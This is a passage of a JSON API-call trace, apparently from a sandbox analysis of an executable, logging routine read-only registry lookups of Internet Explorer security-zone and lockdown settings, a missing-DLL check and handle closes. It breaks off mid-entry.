{ "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" } ], "repeated": 0, "id": 609 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 610 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" } ], "repeated": 0, "id": 611 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 612 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" } ], "repeated": 0, "id": 613 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 614 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003dc" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" } ], "repeated": 0, "id": 615 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003dc" }, { "name": "ValueName", "value": "Flags" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\Flags" } ], "repeated": 0, "id": 616 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003dc" } ], "repeated": 0, "id": 617 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d8" } ], "repeated": 0, "id": 618 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537629", "parentcaller": "0x764f28bb", "category": "registry", "api": "NtEnumerateKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "Index", "value": "4" } ], "repeated": 0, "id": 619 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 620 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d8" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4" } ], "repeated": 0, "id": 621 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 622 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4" } ], "repeated": 0, "id": 623 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 624 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4" } ], "repeated": 0, "id": 625 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 626 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4" } ], "repeated": 0, "id": 627 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 628 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003dc" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4" } ], "repeated": 0, "id": 629 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003dc" }, { "name": "ValueName", "value": "Flags" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "3" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\Flags" } ], "repeated": 0, "id": 630 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003dc" } ], "repeated": 0, "id": 631 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d8" } ], "repeated": 0, "id": 632 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537629", "parentcaller": "0x764f28bb", "category": "registry", "api": "NtEnumerateKey", "status": false, "return": "0xffffffff8000001a", "pretty_return": "NO_MORE_ENTRIES", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "Index", "value": "5" } ], "repeated": 0, "id": 633 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d0" } ], "repeated": 0, "id": 634 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764fc461", "parentcaller": "0x72a5b696", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "msiso.dll" }, { "name": "ModuleHandle", "value": "0x72a5b7a3" } ], "repeated": 0, "id": 635 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002e8" }, { "name": "ObjectAttributesName", "value": "FEATURE_LOCALMACHINE_LOCKDOWN" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN" } ], "repeated": 0, "id": 636 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002e4" }, { "name": "ObjectAttributesName", "value": "FEATURE_LOCALMACHINE_LOCKDOWN" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN" } ], "repeated": 0, "id": 637 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "ValueName", "value": "f1ffd3c13b7bd7f498e8.exe" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN\\f1ffd3c13b7bd7f498e8.exe" } ], "repeated": 0, "id": 638 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "ValueName", "value": "*" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN\\*" } ], "repeated": 0, "id": 639 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x72a52554", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d0" } ], "repeated": 0, "id": 640 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 641 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\" } ], "repeated": 0, "id": 642 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 643 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\" } ], "repeated": 0, "id": 644 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 645 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\" } ], "repeated": 0, "id": 646 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 647 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\" } ], "repeated": 0, "id": 648 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 649 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\" } ], "repeated": 0, "id": 650 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 651 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\" } ], "repeated": 0, "id": 652 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537629", "parentcaller": "0x764f28bb", "category": "registry", "api": "NtEnumerateKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "Index", "value": "0" } ], "repeated": 0, "id": 653 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764e15a7", "parentcaller": "0x764e14c4", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x40000000", "arguments": [ { "name": "Handle", "value": "0x000003d8" }, { "name": "MutexName", "value": "Local\\ZonesLockedCacheCounterMutex" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 654 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 655 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003dc" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\0" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\0" } ], "repeated": 0, "id": 656 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 657 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\0" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\0" } ], "repeated": 0, "id": 658 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 659 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\0" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\0" } ], "repeated": 0, "id": 660 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 661 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\0" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones\\0" } ], "repeated": 0, "id": 662 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 663 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e0" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0" } ], "repeated": 0, "id": 664 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003e0" }, { "name": "ValueName", "value": "Flags" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "33" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\Flags" } ], "repeated": 0, "id": 665 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003e0" } ], "repeated": 0, "id": 666 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c4b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003dc" } ], "repeated": 0, "id": 667 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537629", "parentcaller": "0x764f28bb", "category": "registry", "api": "NtEnumerateKey", "status": true, 